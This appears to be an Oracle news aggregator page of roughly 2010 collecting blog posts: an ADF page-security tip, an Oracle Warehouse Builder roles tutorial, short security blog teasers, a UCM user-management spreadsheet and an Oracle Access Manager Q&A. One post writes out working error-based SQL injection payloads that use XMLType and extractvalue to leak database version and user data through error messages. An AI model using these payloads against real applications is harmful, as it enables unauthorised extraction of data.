OraNA :: Oracle News Aggregator

I saw Charles Hoopers post titled " Why Doesn’t This Trigger Work â€" No Developer Tools Allowed in the Database " via my Oracle blogs aggregator and read it with interest as its related to issues i come across with....[Read More]

Posted by Pete On 10/03/10 At 11:08 AM

Viewlets are now available for a variety of PeopleTools topics. They are posted on oracle.com. See the banner topic on the Peopletools page:
http://www.oracle.com/applications/peoplesoft/tools_tech/ent/ptools/index.html

Or go directly here: http://download.oracle.com/peopletools/viewlets.html

These are published on the publicly accessible oracle.com site.

It has been quite a while since my last blog post; i keep promising to post more often and even worse I have a long list of things to blog about but I don't seem to get enough time recently....[Read More]

Posted by Pete On 08/03/10 At 04:04 PM

A great discussion on the JDeveloper forum on OTN brough a new addition to ADF application security that I like to share.

Chapter 30 of the Oracle® Fusion Middleware Fusion Developer’s Guide for Oracle Application Development Framework 11g Release 1 explains the JAAS protection mechanism for ADF pages and Task Flows. In here it is recommended that you reduce the number of JSF pages in the adfc-config.xml file to the absolute minimum and only give ADF Security permissions to those documents that need to be accessible from a browser request.

All other pages should be located in bounded task flows, which you can protect declaratively against GET requests, as they are issued from a browser URL. Bounded task flows need to be ganted to users through application roles to be accessible.

The discussion on OTN is about protecting the phyical JSPX files. If you are an authenticated and authorized user, then you could directly access the JSPX page, e.g. calling localhost:7101/myapp/faces/Departments.jspx. This then serves the page – though it may not be fully functional because it is not launched within the controller context.

The recommendation therefore is to store JSPX documents under the WEB-INF directory of the public_html folder. This solves the problem of users accessing physical files directly

Frank

Ps.: Note that if moving JSPX documents into the WEB-INF folder is not an option for you, you can write a servlet filter that checks the incoming request URL for the resource it accesses. If a jspx file is accessed you would return a http 403 error.

Oracle Warehouse Builder enables multiple users working on the same repository during the whole lifecycle of warehouse development. As a well-organized group, these users are usually grouped by different roles: some are in charge of developing ETL metadata; others are responsible for testing these objects (mappings, process flows, etc) and making sure their correctness. In this article I'd like to provide a simple example on building up multi-role development environment in OWB - with OWB Security.

OWB Security enables us to define security on the objects stored in repository (object privileges) and control access to system-level services (system privileges). With OWB Security we are able to define multiple users/roles, and apply a different security strategy to each. I will implement a 2-role environment utilizing OWB Security: DEVELOPER, who develops ETL objects; and QA, who tests those developed objects and verify their correctness. I will also create users as DEVELOPER or QA. Then we will see how we benefit from this 2-roles environment during warehouse development.

1. Set up a new workspace

Let's start by creating a new workspace. A workspace is the place where all ETL objects live. In OWB 11.2, workspaces are stored in a single schema and it's simple to create one - using the Repository Assistant.

Here I create a workspace named "wksp1" with user "admin" as its owner. Understand that the workspace owner is the super user of the workspace, just like root in Linux. We would proceed with subsequent steps using this account.

2. Revoke all privileges from EVERYONE role

As we have the workspace prepared, we are able to log into the Design Client as workspace owner "admin". Before creating any role/user, we should do one thing immediately - revoke all privileges from EVERYONE role.

OWB automatically creates two predefined roles for each workspace - ADMINISTRATOR and EVERYONE. ADMINISTRATOR owns ALL object privileges and system privileges to the workspace. Workspace owner ("admin" in our case) is by default the granted ADMINISTRATOR role. EVERYONE is by default granted to every workspace user and it cannot be revoked for any user.

EVERYONE role has many default system privileges and object privileges. As each OWB user is by default granted with EVERYONE role, they would also inherit privileges from EVERYONE. Since we will create users with security strategy inherit from our own roles, we don't want it affected by role EVERYONE. So we should de-select all privileges from EVERYONE role immediately after we log into the new workspace. The following lists what we should do:

• Edit role EVERYONE to de-select all system privileges from the role.

• Edit user ADMIN to revoke all object privileges from role EVERYONE, so that EVERYONE has no privileges to objects created by user ADMIN. Notice that we would need to repeat this each time one new user is created.

3. Define roles inside workspace

Now we can start defining roles inside the workspace. But I would talk about basic concepts of default object privileges and system privileges before going on.

Default object privileges define the access other users and roles have to objects the selected user creates. There defined following object privileges in OWB: FULL_CONTROL, EDIT, COMPILE and READ. They are additive, which means when you select COMPILE you apply both COMPILE and READ. Notice that FULL_CONTROL means EDIT plus the ability to grant and revoke privilege on an object.

System privileges define user access to workspace-wide service. For example, CREATE_PROJECT allows user to create projects, while CONTROL_CENTER_DEPLOYMENT allows user to deploy to the Control Center and then run those procedure.

For more details on object privileges and system privileges, please refer to OWB Installation and Administration Guide.

In our case we should define two roles: DEVELOPER, who is responsible for developing all ETL objects inside the workspace; and QA, who is responsible for testing ETL objects created by the developer.

As for DEVELOPER, they should be able to create and edit projects and all ETL objects under them, and to deploy and execute them inside the control center. But they do not need to grant and revoke privilege of other users/roles, or view created objects in the browser, etc. So we should grant EDIT as default object privilege, and all system privilege except ACCESS_PUBLICVIEW_BROWSER.

As for QA, they should NOT be able to create/edit ETL objects inside the workspace. But they should be able to compile, deploy and execute the ETL objects in order to test them. So we would grant COMPILE as its default object privilege, and grant all control center system privileges to it.

Here we create new roles DEVELOPER and QA, and grant system privileges to the roles. We will set default object privileges later on when we create users.

4. Create users and grant them with different roles

As roles are defined, we are able to create users and grant proper role to them. Remember that we should also set default object privileges after creating users.

Firstly let's create user DEV1, assign role DEVELOPER to it, and user QA1, with role QA.

Then we grant default object privileges to roles DEVELOPER and QA for users DEV1 and QA1. Pay attention we should also revoke all privileges from role EVERYONE! (See preceding section: Revoke all privileges from EVERYONE role)

 

Here for DEV1, we allow users with role DEVELOPER to EDIT all objects created by it, and only allow users with role QA to COMPILE.

Settings for user QA1 looks somewhat strange - we revoke all default object privileges from all roles! Remember that QA cannot create/edit ETL objects inside workspace? And it's save to revoke all default object privileges for all roles, as there will be no objects created by QA1!

Now there comes out another question - how we guarantee that QA1 is not allowed to create ANY objects inside workspace? The answer is as follows.

• For objects created by DEV1, user QA1 cannot edit them. And OWB guarantees that the same default privileges pass to children objects. As QA1 cannot edit project created by DEV1, they cannot create any new objects under those projects.
• We revoke system privilege CREATE_PROJECT from role QA (Remember?), and hence QA1 cannot create its own project and all objects under it.
• There is also a predefined project MY_PROJECT, and we can revoke all privileges for role EVERYONE from its Security Panel (By select menu "View-> Security" to open the panel). So now user QA1 cannot create any objects under MY_PROJECT.

5. Verify the final result and enjoy our multi-role workspace

Now we've done with all settings for workspace "wksp1" and can proceed with our warehouse development tasks on it. Let's check it out.

Firstly let's log in the workspace as user DEV1, and we are able to start our ETL development. We can create new project and oracle module, import tables, create mapping, deploy and execute the mapping created.

Then let's log into the workspace with user QA1.

If we double-click to open mapping MAP_SRC_TO_TGT created by user DEV1, it would pop-up warning message showing that we can only open the object in Read-Only mode.

Meanwhile we are able to compile and deploy the same mapping as user QA1. That's what we desired as QA.

And if we try to create a new mapping under same oracle module ORA_TARGET, it would warn us that we are not allowed to do so - also what we wanted in this case!

 

In summary this article illustrates a simple example on building up a multi-role development environment in OWB. We hope you find it helpful in building up your own environment - possibly with more complex roles and users.

Hello World, Congratulations to Sentrigo for being nominated again in the SC Awards in the US for Hedgehog. http://www.scmagazineus.com/scawards2010-finalists/section/1309/ Just came across an ex-colleague from Pentest Ltd named Simon Fletcher who has started a blog on Oracle Security. http://blog.fifteentwentyone.co.uk/2010/02/sql92security.html Nice post and good luck with the new blog. Oracle config issues like these are interesting for already very highly secured [...]

As you can see here, the Python code handles a specific case of Oracle TNS layer requesting a RESEND of the last packet. I’ve noticed that no matter what client I’m trying to connect with, Oracle is always requesting a RESEND after the initial CONNECT request as you can see here (removed various ACK packets, [...]

We had a great time at the SC magazine awards dinner on Tuesday. We were finalists in the “best SME security solution” category but unfortunately we did not win. Here is Andy, our VP marketing before the dinner and announcements: And here he is after some wine and us not winning:

So, I arrived to Moscone Center a bit late for the first cloud security alliance session. It turns out that there was a huge line to enter and a lot of people were left outside. Having a free 1.5 hours, I wanted to connect and check emails. I’ve already received my password so I thought it [...]

Hi Folks, Vulnerability in E-Business Suite R12 requires non-default diagnostics mode so Low risk. http://www.securityfocus.com/archive/1/509460 Having said that it is worth keeping an eye on Internet facing Oracle applications, though there is not a huge amount on this from O’Reilly and Apress. Google books has a relevant book free of charge named “Security, Audit and Control Features Oracle E-Business [...]

It's been a while since I wrote my last blog entry. Actually, it's been a really long while. In the interim, I've since sold NGSSoftware and after staying on for 16 months have now resigned and am taking a wee break, but planning my next venture - V3rity. All will be revealed. Soon.

Posted by David On 26/02/10 At 03:34 PM

As promised, here is a small Python script to allow you to enumerate and find Oracle SIDs. Of course, the usual caveats apply – if it breaks something, I’m not responsible Use at your own risk. I’m using the sidlist.txt file from David’s OAK but there are plenty of available resources with common SID [...]

One of the handiest tools that I use with UCM is the Mass Metadata Update Excel spreadsheet. It lets you run searches against UCM and update content metadata in an Excel spreadsheet through web services. It was first created by Bex and then later enhanced by Jason Stortz.

For demonstration purposes, it's a great way to show how open and easy it is to do integrations with UCM. Just a few lines of VB script in an Excel macro and you've got an incredibly useful client tool.

In thinking about other tasks that you may need to do in bulk in UCM besides dealing with content is managing users. Even with external user stores, information is captured and stored in UCM. So one of the first things I did with the spreadsheet was to modify it to add and delete users. Then I made further changes to be able to get a list of the users and to do edits on the users.

Someone recently asked me the best way to mass delete users that had been cached their from their old LDAP schema. In the User Admin applet, it doesn't let you multi-select so that becomes a very slow process. One alternative is to get the DBA involved and deal with the data directly in the database tables which isn't ideal either.

But with this spreadsheet, you can quickly add, edit, or delete the users in the system. When you open this in Excel, be sure you have your security set to allow macros.

When you first try to execute one of the commands, it will prompt you for your administrator username and password. Be warned though...once you click the confirmation dialog, it is set to perform that action. I'd recommend backing up the system before making any large-scale changes.

All of the code is right in the macros and can easily be modified to change the behavior such as adding more user metadata fields or filtering on certain user types.

You can download a copy of the spreadsheet here. This should be treated just like a sample component which is provided as-is with no support or warranties.

Today I came across a nice blog article “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” from Dmitry Evteev about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL Injection it’s error based which is a small but important difference) the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.

Using error messages of XMLType:

The XMLType allows to create error messages containing custom strings (like database users, passwords, …). The string must start with a ‘<:’ that’s why we have to concatenate  ‘<:’  to the string.  Additionally the all spaces and at-signs must be replaced.

SQL> select XMLType((’<:’||user||’>’)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName “:SYS” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

SQL> select XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
“:Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

This can be used in an SQL Injection statement:

or 1=length(XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)))–

The second technique is mentioned in the comments: 

SQL> select extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)) from dual;

*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: ‘/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product‘

 This can be used in an SQL Injection statement:

or 1=length(extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)))–

Hi all,

Here I am going to post OAM questions and answers.

Oracle Access Manager is a state-of-the-art solution for both centralized identity management and access control, providing an integrated standards-based solution that delivers authentication, web single sign-on, access policy creation and enforcement, user self-registration and self-service, delegated administration, reporting, and auditing.    

Q: What is Single Sign On?
A: Single Sign-On allows users to sign on once to a protected application and gain access to the other protected resources within the same domain defined with same authentication level.

Q: What is multi domain Single Sign-On?
A:  Multi Domain SSO gives users the ability to access more than one protected resource (URL and Applications), which are scattered across multiple domains with one time authentication.

Q: What is the authentication mechanism used by Oracle Access Manager?
A: ObSSOCookie and it is stateless.

Q: Explain various security modes present in Oracle Access Manager?
A:
Open: Allows unencrypted communication. In Open mode, there is no authentication or encryption between the AccessGate and Access Server. The AccessGate does not ask for proof of the Access Server’s identity and the Access Server accepts connections from all AccessGates. Similarly, Identity Server does not require proof of identity from WebPass.
Simple: Supports encryption by Oracle. In Simple mode communications between Web clients (WebPass and Identity Server, Policy Manager and WebPass, and Access Server and WebGate are encrypted using TLS v1. In both Simple and Cert mode, Oracle Access Manager components use X.509 digital certificates only. This includes Cert Authentication between WebGates and the Access Server where the standard cert-decode plug-in  decodes the certificate and passes certificate information to the standard credential_mapping authentication plug-in. For each public key there exists a corresponding private key that Oracle Access Manager stores in the aaa_key.pem file for the Access Server (or ois_key.pem for Identity Server).
Cert: Requires a third-party certificate. Use Cert (SSL) mode if you have an internal Certificate Authority (CA) for processing server certificates. In Cert mode, communication between WebGate and Access Server, and Identity Server and WebPass are encrypted using Transport Layer Security, RFC 2246 (TLS v1).

Q: Explain the architecture of Oracle Access Manager?
A: Oracle Access Manager architecture mainly consists for components such as Identity Server, WebPass, Policy Manager, Access Server and a WebGate. Identity Server is a standalone C++ server which communicates directly with LDAP.
It also receives requests and sends response to Webpass. WebPass is a web server plugin that passes info between identity server and webserver. It redirects HTTP requests from browser to Access Server, and sends Identity XML SOAP requests to Identity Server.
Policy Manager (PMP or PAP) is a web server plugin that communicates directly with user, configuration and policy repositories. Access Server is a stand alone C++ server and is also called PDP. It receives requests from & sends responses to WebGates/AccessGates.
It also communicates with LDAP. It answers Access Server SDK requests. WebGate (PEP) is a web server plugin that passes info between webserver and access server. It passes user authentication data to access server for processing.

Q: What are the ObSSOCookie Contents?
A: Cookie contains encrypted session token and non-encrypted data.
This Encrypted Session Token consists of : DN of the authenticated user, level of auth scheme, ip address of client to which cookie was issued, time the cookie is issued, time the cookie was last updated. If the user is not idle, then cookie will get automatically updated at a fixed interval to prevent session timeout. The updated interval is the 1/4 th of idle session timeout of accessgate.
The Unencrypted ObSSOCookie data contains cookie expiry time, domain in which cookie is valid, additional flag that determines if cookie can only be sent using SSL.

Q: What is the key used for encrypting the ObSSOCookie?
A: Shared Secret key. It is configured in the Identity Admin console and can be generated by the OAM administrator.

Q: What happens if the ObSSOCookie is tampered?
A:  When access system generates ObSSOCookie, MD-5 hash is taken from session token. So when the user is authenticated again using the cookie, the MD5 hash is compared with original cookie contents. MD-5 hash is a one-way hash, hence it cant be unencrypted. Access server compares the cookie contents with hash. If both are not same, then cookie is tampered in the interim. This cookie does not contain username and password.

Q: What is the difference between WebGate and AccessGate?
A: WebGate is an out-of-the-box plug-in that intercepts Web resource (HTTP) requests and forwards them to the Access Server for authentication and authorization. An AccessGate is a custom webgate that can intercept requests of HTTP and non-HTTP resources.
 
Q: What are the major parameters defined in an authentication scheme?
A: The authentication scheme level which defines the level of the security defined for an application.

Q: Explain the flow when a user requests for an application protected by Oracle Access Manager?
A: The following steps describes the flow when a user makes a request to access a resource protected by the Oracle Access Manager.

• User requests for a resource through a web browser.
• The Webgate intercepts the requests and checks with the Access Server whether the resource is protected or not.
• If the resource is not protected, then the user will be shown the requested resource.
• If the resource is protected, then Access Server will check with policy manager the authentication scheme configured for that resource.
• User will be prompted to enter their credentials as per the auth scheme defined for the resource.
• Webgate will send the credentials to the Access Server to check it against the backend (LDAP server).
• Upon successful authentication, Access server checks whether the user is authorized to access the resource or not.
• If the user is authorized, then the Access Server will create the session id and passes it to the webgate. An ObSSOCookie is created and will be sent to the user browser and the user will be shown the requested resource.
• If the user is not authorized, then an error page (if its defined in policy domain) will be shown to the user.

Q: Explain the flow of a Multi domain Single Sign-On?
A: Multi Domain SSO gives users the ability to access more than one protected resource (URL and Applications), which are scattered across multiple domains with one time authentication.

• For multi domain SSO to work, Access Servers in all domains must use same policy directory.
• Multi domain works only with web gates, not Access Gates.
• Within each individual domain, each web gate must have same “primary HTTP cookie domain”.

In Multi Domain SSO environment, we should designate one web server (where web gate is installed) as “Primary Authentication Server”. Primary Authentication Server acts as a central server for all authentications in multi domain environment. In general the webgate installed in the domain where Access server resides will be designated as the primary authentication server.

Lets assume that OAM components are installed in host1.domain1.com and we will designate host1.domain1.com as the primary authentication server.
* Host2.domain2.com with web gate (ex: webgate2) installed.
* A resource, abc.html, is protected with Form base authentication on host1.mydomain1.com
* A resource, xyz.html, is protected with Basic over LDAP authentication on host2.mydomain2.com.

Following are the steps that explain how multi domain SSO works
1. User initiates a request for a Web page from a browser.
For instance, the request could be for host2.mydomain2/xyz.html.
2. Webgate2 (on host2.domain2.com) sends the authentication request back through the user’s browser in  search of primary authentication server.  In this example you have designated host1.domain1.com to be the primary authentication server.
3. The request for authentication is sent from the user’s browser to the primary authentication server, host1.domain1.com.
This request flows to the Access Server. The user logs in with the corresponding authentication scheme and the obSSO cookie is set for host1.domain1.com. The Access Server also generates a session token with a URL that contains the obSSO Cookie.
4. The session token and obSSOCookie are returned to the user’s browser.
5. The session token and obSSOCookie are sent to host2.domain2.com
6. The Web gate (webgate2) on host2.domain2.com sets the obSSOCookie for its own domain (.domain2.com) and satisfies the user’s original request for the resource host2.domain2.com/xyz.html. User gets the resource.
7. On the same browser if user accesses the host1.domain1.com page then resource will be presented without asking credentials as obSSOCookie is already available with .domain1.com (see step 3).

Q: What is an Access Server SDK?
A: The Access Manager Software Developer’s Kit (SDK) enables you to enhance the access management capabilities of the Access System. This SDK enables you to create a specialized AccessGate. The Access Manager SDK creates an environment for you to build a dynamic link library or a shared object to perform as an AccessGate. You also need the configureAccessGate.exe tool to verify that your client works correctly.

Q: What is an Identity XML?
A: IdentityXML provides a programmatic interface for carrying out the actions that a user can perform when accessing a COREid application from a browser. For instance, a program can send an IdentityXML request to find members of a group defined in the Group Manager application, or to add a user to the User Manager.

IdentityXML enables you to process simple actions and multi-step workflows to change user, group, and organization object profiles.
After creating the IdentityXML request, you construct a SOAP wrapper to send the IdentityXML request to WebPass using HTTP. The IdentityXML API uses XML over SOAP. We pass IdentityXML parameters to the COREid Server using an HTTP request.This HTTP request contains a SOAP envelope.When WebPass receives the HTTP request, the SOAP envelope indicates that it is an IdentityXML request rather than the usual browser request.
The request is forwarded to the COREid Server, where the request is carried out and a response is returned. Alternatively, you can use WSDL to construct the SOAP request. The SOAP content looks like this, SOAP envelope (with oblix namespace defined), SOAP body (with authentication details), actual request (with application name and params). The application name can be userservcenter, groupservcenter or objservcenter (for organizations).

Q: What is an SSPI connector and its role in Oracle Access Manager integrations?
A:  The Security Provider for WebLogic SSPI (Security Provider) ensures that only appropriate users and groups can access Oracle Access Manager-protected WebLogic resources to perform specific operations. The Security Provider also enables you to configure single sign-on between Oracle Access Manager and WebLogic resources.
The WebLogic security framework provides Security Service Provider Interfaces (SSPIs) to protect J2EE applications. The Security Provider takes advantage of these SSPIs, enabling you to use Oracle Access Manager to protect WebLogic resources via:

• User authentication
• User authorization
• Role mapping

The Security Provider consists of several individual providers, each of which enables a specific Oracle Access Manager function for WebLogic users:
Authenticator: This security provider uses Oracle Access Manager authentication services to authenticate users who access WebLogic applications. Users are authenticated based on their credentials, such as user name and password.
The security provider also offers user and group management functions. It enables the creation and deletion of users and groups from the BEA WebLogic Server. It also provides single sign-on between WebGates and portals.
Identity Asserter: Like the Authenticator, this security provider uses Oracle Access Manager authentication services to validate already-authenticated Oracle Access Manager users using the ObSSOCookie and to create a WebLogic-authenticated session.
Authorizer: This security provider uses Oracle Access Manager authorization services to authorize users who are accessing a protected resource. The authorization is based on Oracle Access Manager policies.
Role Mapper: This security provider returns security roles for a user. These roles are defined in Oracle Access Manager, and they are provided by Oracle Access Manager using return actions on a special authentication policy. This authentication policy contains a resource with a URL prefix of /Authen/Roles. Role Mapper maps these roles to predefined security roles in WebLogic.

Q: Explain the integration and architecture of OAM-OAAM integration?
A: Using these products in combination will allow you fine control over the authentication process and full capabilities of pre-/post- authentication checking against Adaptive Risk Manager models.
The OAAM’s ASA-OAM integration involves two Oracle Access Manager AccessGates: one for fronting the Web server (a traditional WebGate) to Adaptive Strong Authenticator and one for the embedded AccessGate. The access server SDK to be installed and configureAccessGate tool to be run. The ASA bharosa files to updated with ASDK location. An application to be protected using ASA authentication scheme and to be tested for ASA landing page for login.

Here is how the flow goes:
1. User requests for a resource.
2. Webgate acting in the front end for ASA application will intercept the request and will redirect to the ASA application.
3. The user enter credentials and the Access SDK setup in the ASA application will contact the Access gate which inturn contacts the access server for validating the credentials.
4. Upon successful authentication, access server will generate obSSOCookie and will forwards it to the browser.
5. Then the user will be shown the requested resource.

Q: Explain IWA mechanism in Oracle Access manager?
A: The OAM has a feature which enables Microsoft Internet Explorer users to automatically authenticate to their Web applications using their desktop credentials. This is known as Windows Native Authentication.

1. user logs in to the desktop machine, and local authentication is completed using the Windows Domain Administrator authentication scheme.
2. The user opens an Internet Explorer (IE) browser and requests an Access System-protected Web resource.
3. The browser notes the local authentication and sends a token to the IIS Web server.
4. The IIS Web server uses the token to authenticate the user and set up the REMOTE_USER HTTP header variable that specifies the user name supplied by the client and authenticated by the server.
5. The WebGate installed on the IIS Web server uses the hidden feature of external authentication to get the REMOTE_USER header variable value and map it to a DN for the ObSSOCookie generation and authorization.
6. The WebGate creates an ObSSOCookie and sends it back to the browser.
7. The Access System authorization and other processes proceed as usual.
   The maximum session timeout period configured for the WebGate is applicable to the generated ObSSOCookie.

Q: Explain various major params defined in webgate instance profile?
A:

• Hostname: name of the machine hosting the access gate.
• Maximum User Session Time: Maximum amount of time in seconds that a user’s authentication session is valid, regardless of their activity. At the expiration of this session time, the user is re-challenged for authentication. This is a forced logout. Default = 3600. A value of 0 disables this timeout setting.
• Idle Session Time (seconds): Amount of time in seconds that a user’s authentication session remains valid without accessing any AccessGate protected resources.
• Maximum Connections: Maximum number of connections this AccessGate can establish. This parameter is based on how many Access Server connections are defined to each individual Access Server. This number may be greater than the number allocated at any given time.
• IPValidationException: IPValidationException is specific to WebGates. This is a list of IP addresses that are excluded from IP address validation. It is often used for excluding IP addresses that are set by proxies.
• Maximum Client Session Time  :Connection maintained to the Access Server by the AccessGate. If you are deploying a firewall (or another device) between the AccessGate and the Access Server, this value should be smaller than the timeout setting for the firewall.
• Failover Threshold: Number representing the point when this AccessGate opens connections to Secondary Access Servers. If you type 30 in this field, and the number of connections to primary Access Servers falls to 29, this AccessGate opens connections to secondary Access Servers.
•  Preferred HTTP Host : Defines how the host name appears in all HTTP requests as they attempt to access the protected Web server. The host name in the HTTP request is translated into the value entered into this field regardless of the way it was defined in a user’s HTTP request.
• Primary HTTP Cookie Domain: This parameter describes the Web server domain on which the AccessGate is deployed, for instance, .mycompany.com.

• IPValidation: IP address validation is specific to WebGates and is used to determine whether a client’s IP address is the same as the IP address stored in the ObSSOCookie generated for single sign-on.

Q: What is Policy Manager API?
A:  The Policy Manager API provides an interface which enables custom applications to access the authentication, authorization, and auditing services of the Access Server to create and modify Access System policy domains and their contents.

Q: When do you need an access gate?
A: An access gate is required instead of a standard webgate when you need to control access to a resource where OAM doesnot provide OOTB solution. These might include:

1. protection for non-http resources (EJB, JNDI etc.,)
2. Implementation of SSO to protect a combination of http and non-http resources.

A file called obAccessClient.xml is stored in the server where access gate is installed. this file contains config params entered through the configureAccessGate tool.

Q: Explain the flow when a user makes a request protected by an access gate (not webgate)?
A: The flow is shown below.

• The application or servlet containing the access gate code receives resource request from the user.
• The access gate code constructs ObResourceRequest structure and access gate contacts Access server to find whether resource is protected or not.
• The access server responds.
• If the resource is not protected, access gate allows user to access the resource. Otherwise..,
• Access Gate constructs ObAuthenticationScheme structure to ask Access Server what credentials the user needs to supply.
• The access server responds.
• The application uses a form or some other means to fetch the credentials.
• The AccessGate constructs ObUserSession structure which presents user details to Acc Server.
• If credentials are proven valid, access gate creates a session token for the user and then sends an authorization request to the access server.
• Access server validates if the user is authz to access that resource.
• Access gate allows user to access the requested resource.

Share This